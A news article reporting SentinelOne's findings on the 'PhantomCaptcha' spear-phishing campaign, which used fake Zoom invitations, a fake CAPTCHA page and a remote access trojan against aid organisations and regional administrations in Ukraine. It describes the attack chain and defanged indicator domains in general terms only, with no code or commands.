Kyiv – In the midst of Ukraine’s ongoing war, a new cyber threat has quietly emerged, this time aimed not at soldiers or infrastructure but at those trying to help.
According to a report released Wednesday by SentinelOne, a sophisticated spear-phishing campaign—codenamed “PhantomCaptcha”—has targeted members of international aid and humanitarian organizations operating in Ukraine. The victims included personnel from the International Red Cross, UNICEF’s Ukraine office, the Norwegian Refugee Council, and even regional government administrators in Donetsk, Poltava, Dnipropetrovsk, and Mykolaiv.
The attackers, posing as representatives of the Ukrainian President’s Office, sent out booby-trapped PDF invitations to what appeared to be official Zoom meetings. The documents contained embedded links to a fake conferencing portal, “zoomconference.app,” that mimicked the real Zoom website.
FCRF Launches CCLP Program to Train India’s Next Generation of Cyber Law Practitioners
“This campaign demonstrates a chilling fusion of social engineering and technical precision,” said Tom Hegel, a senior threat researcher at SentinelOne. “It shows how humanitarian channels have become the new vector for digital espionage.”
A Weaponized PDF and a Deceptive CAPTCHA
Once victims clicked the link, they were met with a fake Cloudflare CAPTCHA page, designed to look like a harmless security check. Instead, it executed an obfuscated PowerShell command, triggering a multi-stage infection chain.
The downloader contacted Russian-owned infrastructure, retrieved additional payloads, and installed a custom WebSocket-based remote access trojan (RAT)—a stealthy backdoor granting attackers full control of the victim’s device.
The RAT communicated through encrypted WebSocket connections, enabling remote command execution, data exfiltration, and potential deployment of further malware. The system was designed with layers of deception: the fake CAPTCHA acted as a relay between the victim’s machine and the command server, while a real password-protected Zoom page was shown in parallel to make the attack appear legitimate.
“It’s a strikingly well-crafted blend of technology and timing,” Hegel added. “Everything about this operation—from the fake conferencing domain to the short-lived infrastructure—points to experienced operators with strong operational security.”
From Planning to Execution: Six Months of Preparation
Investigators discovered that the PhantomCaptcha infrastructure was in the works for over six months. The attackers registered domains such as “goodhillsenterprise[.]com” back in March 2025 to host malicious scripts, while “zoomconference[.]app”—the fake meeting site—was activated for only one day: October 8, 2025, the day of the attacks.
The one-day activation suggests tight control and deliberate exposure limits—hallmarks of a threat actor well-versed in compartmentalized operations. SentinelOne’s telemetry also revealed fake Android applications hosted on a companion site, “princess-mens[.]click,” that collected geolocation data, contacts, and call logs—indicating a multi-platform surveillance ecosystem.
Although no group has been formally blamed, SentinelOne noted tactical overlaps with COLDRIVER, a Russia-linked hacking outfit previously tied to credential phishing operations against NATO officials and journalists.
Humanitarian Targets in the Crosshairs
This latest intrusion adds to a growing pattern: hackers targeting aid and relief groups amid wartime instability. Experts say such operations aim not only to steal information but also to disrupt the digital logistics of humanitarian response, from donor communications to field coordination.
“The humanitarian sector has become the soft underbelly of modern conflict,” said a cybersecurity official familiar with Ukraine’s digital defense programs. “Threat actors know that aid groups lack the same infrastructure and budget as governments or defense agencies, yet they handle highly sensitive data.”
For Ukraine’s allies and international organizations, the implications are serious: data from relief agencies often includes personal details of displaced civilians, donor accounts, and cross-border supply information—all valuable intelligence in a hybrid war environment.
A Warning for the Global Aid Ecosystem
PhantomCaptcha’s brief but well-orchestrated campaign illustrates the changing face of cyberwarfare: small, controlled, and surgically targeted. The combination of social engineering, Zoom mimicry, and PowerShell-based remote access shows how traditional malware has evolved into multi-layered psychological operations.
SentinelOne described the campaign as “a masterclass in operational discipline.” The attackers appeared, struck, and vanished—taking down visible domains within hours while maintaining backend command servers for continued monitoring.
“It’s not just about stealing data,” said Hegel. “It’s about eroding trust in the very systems we use to collaborate and communicate in crises.”
For aid workers across Eastern Europe, that erosion may be the most dangerous weapon of all.
